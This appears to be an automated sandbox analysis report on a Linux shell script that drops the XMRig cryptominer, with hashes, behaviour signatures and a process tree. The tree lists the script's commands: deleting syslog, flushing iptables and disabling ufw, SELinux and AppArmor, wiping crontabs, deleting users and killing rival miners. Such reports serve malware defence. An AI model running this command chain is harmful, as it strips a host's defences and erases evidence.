Analysis
-
max time kernel
149s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
09-09-2024 17:01
Static task
static1
Behavioral task
behavioral1
Sample
a.sh
Resource
ubuntu1804-amd64-20240611-en
General
-
Target
a.sh
-
Size
6KB
-
MD5
e97dee2d99e3bd5150abdfb488aafeb8
-
SHA1
8a9b089a194b383b2202457afa1e0b3ec8fc4d3f
-
SHA256
f5462666cfd610336545233aba5f6014699d4b07829c856d0b99956075f7331b
-
SHA512
1d572bc3c7642ea007d441865c879ce4037848210a5194ea1bf262af22e9b84e674c067138531672758e2fbf7a53e82820502736827366d4688180c1f6bcfa25
-
SSDEEP
192:mRoo5wsIGV7DDf6jlpTWg3vMGQit/3PCd/8PY3+R3YB:mao5wgV7DDf6jlpTWg3vMGQit/3PCd//
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
Processes:
rmdescription ioc process File deleted /var/log/syslog rm -
Flushes firewall rules 3 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
Processes:
ufwiptablesupdate-rc.dpid process 1553 ufw 1725 iptables 1881 update-rc.d -
Processes:
modprobeioc pid process /lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1557 modprobe -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Disables AppArmor 28 IoCs
Disables AppArmor security module.
Processes:
systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlpid process 1895 systemctl 1880 systemctl 1889 systemctl 1889 systemctl 1860 systemctl 1889 systemctl 1889 systemctl 1860 systemctl 1880 systemctl 1885 systemctl 1885 systemctl 1885 systemctl 1897 systemctl 1905 systemctl 1860 systemctl 1860 systemctl 1873 systemctl 1880 systemctl 1880 systemctl 1885 systemctl 1889 systemctl 1860 systemctl 1860 systemctl 1880 systemctl 1885 systemctl 1889 systemctl 1880 systemctl 1885 systemctl -
Disables SELinux 1 IoCs
Disables SELinux security module.
Processes:
setenforcepid process 1859 setenforce -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
Processes:
description ioc pid Changes the process name, possibly in an attempt to hide itself (sysv-install) 1877 -
Reads CPU attributes 1 TTPs 14 IoCs
Processes:
pkillpspkillpgreppgreppkillpkillpkillpspgreppgreppkillpspgrepdescription ioc process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pgrep -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
modprobedescription ioc process File opened for reading /sys/module/ip6_tables/initstate modprobe File opened for reading /sys/module/x_tables/initstate modprobe -
Processes:
killallkillallpspspgreppkillpgreppkillpgreppkillpkillpkillpspkillkillallkillallkillallkillallkillallawkpgreppgrepdescription ioc process File opened for reading /proc/183/stat killall File opened for reading /proc/15/cmdline killall File opened for reading /proc/616/cmdline ps File opened for reading /proc/1092/status ps File opened for reading /proc/1154/cmdline ps File opened for reading /proc/176/cmdline pgrep File opened for reading /proc/89/cmdline pkill File opened for reading /proc/1296/status pgrep File opened for reading /proc/85/cmdline pkill File opened for reading /proc/553/cmdline ps File opened for reading /proc/82/cmdline pgrep File opened for reading /proc/1508/cmdline ps File opened for reading /proc/16/cmdline pgrep File opened for reading /proc/1508/cmdline pgrep File opened for reading /proc/1075/cmdline pgrep File opened for reading /proc/1026/cmdline pkill File opened for reading /proc/422/cmdline pkill File opened for reading /proc/188/status pkill File opened for reading /proc/27/stat killall File opened for reading /proc/559/status ps File opened for reading /proc/177/cmdline pkill File opened for reading /proc/26/cmdline pkill File opened for reading /proc/772/cmdline pkill File opened for reading /proc/994/stat killall File opened for reading /proc/25/stat killall File opened for reading /proc/1141/cmdline pkill File opened for reading /proc/442/cmdline pkill File opened for reading /proc/30/status pkill File opened for reading /proc/1191/cmdline pkill File opened for reading /proc/572/cmdline pkill File opened for reading /proc/485/stat ps File opened for reading /proc/1179/status pgrep File opened for reading /proc/1072/stat killall File opened for reading /proc/1146/stat killall File opened for reading /proc/31/cmdline ps File opened for reading /proc/485/cmdline ps File opened for reading /proc/485/cmdline pkill File opened for reading /proc/9/stat killall File opened for reading /proc/1129/stat killall File opened for reading /proc/1133/cmdline killall File opened for reading /proc/1318/stat killall File opened for reading /proc/self/maps awk File opened for reading /proc/185/cmdline pkill File opened for reading /proc/1026/cmdline pkill File opened for reading /proc/1355/cmdline killall File opened for reading /proc/13/status pgrep File opened for reading /proc/23/cmdline pgrep File opened for reading /proc/1141/status pgrep File opened for reading /proc/1101/cmdline pkill File opened for reading /proc/1510/cmdline pkill File opened for reading /proc/179/status ps File opened for reading /proc/434/status pgrep File opened for reading /proc/25/status pkill File opened for reading /proc/177/stat killall File opened for reading /proc/171/cmdline pgrep File opened for reading /proc/1072/cmdline ps File opened for reading /proc/1193/status pkill File opened for reading /proc/1515/stat ps File opened for reading /proc/1045/cmdline pgrep File opened for reading /proc/23/status pkill File opened for reading /proc/1101/stat killall File opened for reading /proc/16/cmdline pgrep File opened for reading /proc/175/cmdline pgrep File opened for reading /proc/416/cmdline pkill -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
a.shdescription ioc process File opened for modification /tmp/log_rot a.sh
Processes
-
/tmp/a.sh/tmp/a.sh1⤵
- Writes file to tmp directory
PID:1510 -
/bin/grepgrep -v grep2⤵PID:1516
-
/bin/grepgrep .docker2⤵PID:1515
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1514 -
/usr/bin/sudosudo -n true2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1517 -
/bin/rmrm -rf /tmp/a.sh /tmp/config-err-9v8ijU /tmp/netplan_6o2m7k83 /tmp/snap-private-tmp /tmp/ssh-X651Ud74vhtf /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-MRYxba2⤵PID:1519
-
/bin/rmrm -rf /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-nNGoa6 /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-fmSYoe /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-3TrBTk /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-b8W9ey /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PIeStI2⤵PID:1520
-
/bin/rmrm -rf /tmp/. /tmp/.. /tmp/.font-unix /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix2⤵PID:1521
-
/bin/rmrm -rf /var/tmp/. /var/tmp/..2⤵PID:1522
-
/bin/rmrm -rf /root/.docker.json2⤵PID:1523
-
/bin/rmrm -rf /root/.xmrig.json2⤵PID:1524
-
/bin/rmrm -rf /root/.config/docker.json2⤵PID:1525
-
/bin/rmrm -rf /root/.config/xmrig.json2⤵PID:1526
-
/usr/bin/pgreppgrep kdevtmp2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1528 -
/usr/bin/pgreppgrep kthreaddk2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1529 -
/usr/bin/pgreppgrep kinsing2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1530 -
/usr/bin/pgreppgrep solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1531 -
/usr/bin/pgreppgrep sidekiq2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1532 -
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1536 -
/usr/bin/pkillpkill -f kdevtmpfsi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1537 -
/usr/bin/pkillpkill -f xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1538 -
/usr/bin/pkillpkill -f kinsing2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1539 -
/usr/bin/pkillpkill -f systemdd-dev2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1540 -
/usr/bin/killallkillall -9 .dockerd2⤵
- Reads runtime system information
PID:1541 -
/usr/bin/killallkillall -9 .docker2⤵
- Reads runtime system information
PID:1542 -
/usr/bin/killallkillall -9 xmrig2⤵
- Reads runtime system information
PID:1543 -
/usr/bin/killallkillall -9 kthreaddi2⤵
- Reads runtime system information
PID:1544 -
/usr/bin/killallkillall -9 kdevtmpfsi2⤵PID:1545
-
/usr/bin/killallkillall -9 kinsing2⤵
- Reads runtime system information
PID:1546 -
/usr/bin/killallkillall -9 ssrr2⤵
- Reads runtime system information
PID:1547 -
/usr/bin/killallkillall -9 .dockerd2⤵
- Reads runtime system information
PID:1548 -
/usr/bin/killallkillall -9 .docker2⤵PID:1549
-
/usr/bin/killallkillall /bin/bash /var/tmp/.dockerd2⤵PID:1550
-
/usr/bin/killallkillall /bin/bash /.docker2⤵PID:1551
-
/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
PID:1552 -
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
PID:1553 -
/sbin/iptables/sbin/iptables -V3⤵PID:1554
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:1555
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:1556
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
PID:1557 -
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:1561
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:1564
-
/sbin/iptablesiptables -F ufw-not-local4⤵PID:1565
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:1566
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:1567
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:1568
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:1569
-
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:1570
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:1571
-
/sbin/iptablesiptables -F ufw-after-input4⤵PID:1572
-
/sbin/iptablesiptables -F ufw-user-input4⤵PID:1573
-
/sbin/iptablesiptables -F ufw-before-input4⤵PID:1574
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵PID:1575
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:1576
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:1577
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:1578
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:1579
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:1580
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:1581
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:1582
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:1583
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:1584
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:1585
-
/sbin/iptablesiptables -F ufw-track-input4⤵PID:1586
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:1587
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:1588
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:1589
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:1590
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:1591
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:1592
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:1593
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:1594
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:1595
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:1596
-
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:1597
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵PID:1598
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:1599
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:1600
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:1601
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:1602
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵PID:1603
-
/sbin/iptablesiptables -Z ufw-after-input4⤵PID:1604
-
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:1605
-
/sbin/iptablesiptables -Z ufw-before-input4⤵PID:1606
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵PID:1607
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:1608
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:1609
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:1610
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:1611
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:1612
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:1613
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:1614
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:1615
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:1616
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:1617
-
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:1618
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:1619
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:1620
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:1621
-
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:1622
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:1623
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:1624
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:1625
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:1626
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:1627
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:1628
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:1629
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵PID:1630
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:1631
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:1632
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:1633
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:1634
-
/sbin/iptablesiptables -X ufw-user-input4⤵PID:1635
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:1636
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:1637
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵PID:1638
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:1639
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:1640
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:1641
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:1642
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:1643
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:1644
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:1645
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:1646
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵PID:1647
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:1648
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:1649
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:1650
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:1651
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵PID:1652
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵PID:1653
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:1654
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:1655
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:1656
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1657
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1658
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1659
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1660
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1661
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1662
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1663
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1664
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1665
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1666
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:1667
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1668
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1669
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1670
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1671
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1672
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1673
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1674
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1675
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1676
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1677
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1678
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵PID:1679
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1680
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1681
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:1682
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵PID:1683
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵PID:1684
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:1685
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:1686
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵PID:1687
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:1688
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1689
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1690
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1691
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1692
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1693
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1694
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1695
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1696
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1697
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1698
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵PID:1699
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1700
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1701
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1702
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1703
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1704
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1705
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1706
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1707
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1708
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1709
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1710
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵PID:1711
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1712
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1713
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1714
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1715
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:1716
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1717
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1718
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:1719
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1720
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1721
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1722
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1723
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1724
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:1725 -
/usr/sbin/userdeluserdel akay2⤵PID:1726
-
/usr/sbin/userdeluserdel vfinder2⤵PID:1730
-
/bin/grepgrep -i "[a]liyun"2⤵PID:1735
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1731 -
/bin/grepgrep -i "[y]unjing"2⤵PID:1737
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1736 -
/usr/bin/crontabcrontab -r2⤵PID:1738
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1744
-
/bin/grepgrep -v -2⤵PID:1743
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1742
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1741
-
/bin/grepgrep :1432⤵PID:1740
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1750
-
/bin/grepgrep -v -2⤵PID:1749
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1748
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1747
-
/bin/grepgrep :22222⤵PID:1746
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1756
-
/bin/grepgrep -v -2⤵PID:1755
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1754
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1753
-
/bin/grepgrep :33332⤵PID:1752
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1762
-
/bin/grepgrep -v -2⤵PID:1761
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1760
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1759
-
/bin/grepgrep :33892⤵PID:1758
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1768
-
/bin/grepgrep -v -2⤵PID:1767
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1766
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1765
-
/bin/grepgrep :44442⤵PID:1764
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1774
-
/bin/grepgrep -v -2⤵PID:1773
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1772
-
/usr/bin/awkawk "{print \$7}"2⤵
- Reads runtime system information
PID:1771 -
/bin/grepgrep :55552⤵PID:1770
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1780
-
/bin/grepgrep -v -2⤵PID:1779
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1778
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1777
-
/bin/grepgrep :66662⤵PID:1776
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1786
-
/bin/grepgrep -v -2⤵PID:1785
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1784
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1783
-
/bin/grepgrep :66652⤵PID:1782
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1792
-
/bin/grepgrep -v -2⤵PID:1791
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1790
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1789
-
/bin/grepgrep :66672⤵PID:1788
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1798
-
/bin/grepgrep -v -2⤵PID:1797
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1796
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1795
-
/bin/grepgrep :77772⤵PID:1794
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1804
-
/bin/grepgrep -v -2⤵PID:1803
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1802
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1801
-
/bin/grepgrep :84442⤵PID:1800
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1810
-
/bin/grepgrep -v -2⤵PID:1809
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1808
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1807
-
/bin/grepgrep :33472⤵PID:1806
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1816
-
/bin/grepgrep -v -2⤵PID:1815
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1814
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1813
-
/bin/grepgrep :144442⤵PID:1812
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1822
-
/bin/grepgrep -v -2⤵PID:1821
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1820
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1819
-
/bin/grepgrep :144332⤵PID:1818
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1828
-
/bin/grepgrep -v -2⤵PID:1827
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1826
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1825
-
/bin/grepgrep :135312⤵PID:1824
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1834
-
/bin/grepgrep -v -2⤵PID:1833
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1832
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1831
-
/bin/grepgrep :78902⤵PID:1830
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1840
-
/bin/grepgrep -v -2⤵PID:1839
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1838
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1837
-
/bin/grepgrep :34562⤵PID:1836
-
/bin/systemctlsystemctl stop c3pool_miner.service2⤵PID:1841
-
/bin/systemctlsystemctl stop skypool_miner.service2⤵PID:1845
-
/bin/systemctlsystemctl disable c3pool_miner.service2⤵PID:1846
-
/bin/systemctlsystemctl disable skypool_miner.service2⤵PID:1850
-
/usr/bin/killallkillall log_rot2⤵PID:1854
-
/usr/bin/pkillpkill -f log_rot2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1858 -
/usr/sbin/setenforcesetenforce 02⤵
- Disables SELinux
PID:1859 -
/usr/sbin/serviceservice apparmor stop2⤵PID:1860
-
/usr/bin/basenamebasename /usr/sbin/service3⤵PID:1861
-
/usr/bin/basenamebasename /usr/sbin/service3⤵PID:1862
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵PID:1863
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵PID:1869
-
